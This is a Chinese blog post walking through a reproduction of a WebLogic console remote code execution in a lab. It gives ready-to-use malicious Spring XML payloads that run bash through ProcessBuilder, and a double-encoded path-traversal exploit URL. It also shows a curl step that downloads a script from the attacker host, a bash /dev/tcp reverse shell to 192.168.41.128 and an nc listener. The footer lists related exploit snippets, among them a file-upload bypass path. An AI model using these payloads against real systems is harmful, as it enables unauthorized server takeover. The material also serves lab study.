Weblogic漏洞 - 通杀方式

已于 2023-01-16 16:39:12 修改
阅读量1k 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 安全 网络 web java
于 2022-12-09 22:25:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/128259906
版权

文章目录


[linux] WebLogic Server 版本: 12.2.1.3

简介

最早在 CVE-2019-2725 被提出,对于所有Weblogic版本均有效。
构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如 http://example.com/rce.xml

通过 bash-c touch 命令写入 success3 的恶意 .xml文件

恶意文件

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success3]]></value>
          </list>
        </constructor-arg>
    </bean>
 </beans>

把恶意文件部署到攻击机,并开启http服务

cat shell.xml

python3 -m http.server
#开启http服务,需要weblogic加载到此地址

写入文件

利用构造好的poc,使目标机器请求恶意的xml文件

http://目标机器ip:端口/console/css/%252e%252e%252fconsole.portal?_
nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://攻击机IP:端口/shell.xml")

攻击机上有请求记录则攻击成功

去目标机器上看看,success3 是否被写入成功

docker exec -it 容器ID /bin/bash

#进入docker容器

能写入文件,那就可以写入反弹sell的命令直接拿到对方服务器权限

注意:缺点是需要 Weblogic 的服务器能够访问到恶意XML。

写入反弹shell命令

创建shell1.xml 恶意文件

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
	    <value>-c</value>
            <value><![CDATA[curl 192.168.41.128:8000/shell.sh -o /tmp/shell.sh]]></value>
          </list>
        </constructor-arg>
    </bean>
 </beans>

创建 shell.sh 反弹shell的命令文件

touch shell.sh

vim shell.sh

bash -i >& /dev/tcp/192.168.41.128/10010 0>&1

开启http服务

python3 -m http.server

利用以下构造好的poc,进行反弹shell的操作

http://目标机器ip:端口/console/css/%252e%252e%252fconsole.portal?_
nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://攻击机IP:端口/shell1.xml")

攻击机上可以看到,不仅请求了 shell1.xml 还请求了 shell.sh 文件

目标机器里查看 shell.sh 文件一句被写入进,这个文件里面就是反弹shell的命令

既然已经写入进去,接下来要做的就是,通过构造好的poc执行脚本,执行 shell.sh 文件

执行反弹shell命令

命名为 shell2.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
	    <value>-c</value>
            <value><![CDATA[bash /tmp/shell.sh]]></value>
          </list>
        </constructor-arg>
    </bean>
 </beans>

接下来让weblogic请求以下shell2.xml 文件

http://192.168.41.129:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.41.128:8000/shell2.xml")

攻击机开启监听10010端口,等待目标机器反弹shell

nc -lvvp 10010

拿到目标机器权限

渗透测试小白
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
微软通杀漏洞-CVE-2021-1675复现
Gamma_lab的博客
08-06 371
环境 受害机:window2019(192.168.153.133) 攻击机:kali(192.168.153.134) 利用前提 或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限 一定需要:一个普通的域用户 一定需要:开启Spooler服务 环境搭建 安装impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py insta
syWebEditor的一个通杀漏洞
fengling132的专栏
04-20 519
直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp;   上传a.jpg后,shell在根目录下,名为a.asp;a.jpg   试了几个,都能成功,应该是通杀的...
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5488
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
weblogic--反序列化漏洞测试Test
10-19
在"weblogic--反序列化漏洞测试Test"的场景中,我们可以深入探讨以下几个关键知识点: 1. **Java序列化机制**:Java序列化是将对象转换为字节流的过程,便于存储或在网络上传输。反序列化则是这个过程的逆向操作,...
weblogic 漏洞统计 CVE
09-18
然而,如同任何复杂的软件系统,WebLogic也存在安全漏洞,这些漏洞可能被恶意攻击者利用,对服务器造成严重威胁。以下是所提及的一些CVE(Common Vulnerabilities and Exposures)编号以及它们涉及的安全问题: 1. ...
WebLogic CVE-2018-2628漏洞
06-13
CVE-2018-2628是一个严重的安全漏洞,该漏洞影响了WebLogic Server的多个版本,可能导致远程代码执行(RCE)攻击,使得恶意攻击者能够在受感染的服务器上执行任意代码,从而对系统造成严重威胁。 在深入探讨CVE-...
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码中修改![upfile_other.asp]上传木马文件记得加空格
下载程序最新通杀漏洞入侵工具.rar
04-05
下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar
weblogicrce poc
12-21
weblogicrce 测试脚本,使用该工具可以对weblogicrce服务进行检测和利用
实战| 通杀漏洞挖掘技巧
zkaqlaoniao的博客
12-08 129
前端时间,要开放一个端口,让我进行一次安全检测,发现的一个漏洞
Linux内核通杀提权漏洞CVE-2016-5195验证
2301_77512689的博客
04-14 376
2. 改漏洞允许攻击者使用本地账户修改磁盘上的二进制文件,绕过标准权限的限制,这些权限机制通常用于防止修改没有适当的权限集。CVE-2016-5195这个漏洞是linux内核级的本地提权漏洞,原理是linux内核内存子系统在。文件权限也没出错,漏洞执行的过程中没有任何错误但是就是无法写入内容到指定文件中,原因可能是。1. 没有权限的本地用户可以使用此漏洞获取写访问权限,修改制度内存映射,从而提权。有些发行版系统的内核可能在受影响范围内,但是使用上述poc的时候,编译也没出错,
CVE-2020-14882:Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 6215
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
vulhub漏洞weblogic RCE
weixin_45808483的博客
12-02 1098
一开始只知道一个IP 212.129.248.63 使用nmap扫描开放的端口 经过尝试我们发现 7001 端口是我们的要打的靶机漏洞 使用 Xary 扫描 xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html 漏洞利用 ...
某彩虹资源共享通杀漏洞
qq_45832835的博客
07-24 3699
任意文件读取是属于文件操作漏洞的一种。 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要。 是的你没看错,通杀0day 在某天上课的时候闲着,音乐老师放着好运来,好机会啊,赶紧挖个洞看看,接着逛了逛某侠 看到这种表白墙,我就肯定想刷波xss跟sql注入 (遇到这种表白站也是通杀,cont.php处存着sql注入) 谁知点开一看,什么花里胡哨资源共享,看了看可以上传文件,不慌,看看能不能拿下webshell 居然是下载,反正是下载也不多琢磨,看看其他漏洞 随便查看个文件看到name=那里貌似是查看
怎么在网络攻击中屹立不倒
最新发布
dexun123的博客
08-12 872
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
weblogic ebea-090402
09-22
Weblogic ebea-090402是一个版本号,它标识了Weblogic软件的特定版本。Weblogic是一种Java应用服务器,用于构建和部署企业级Java应用程序。它提供了许多功能和工具,以帮助开发人员创建稳定,可扩展和安全的应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值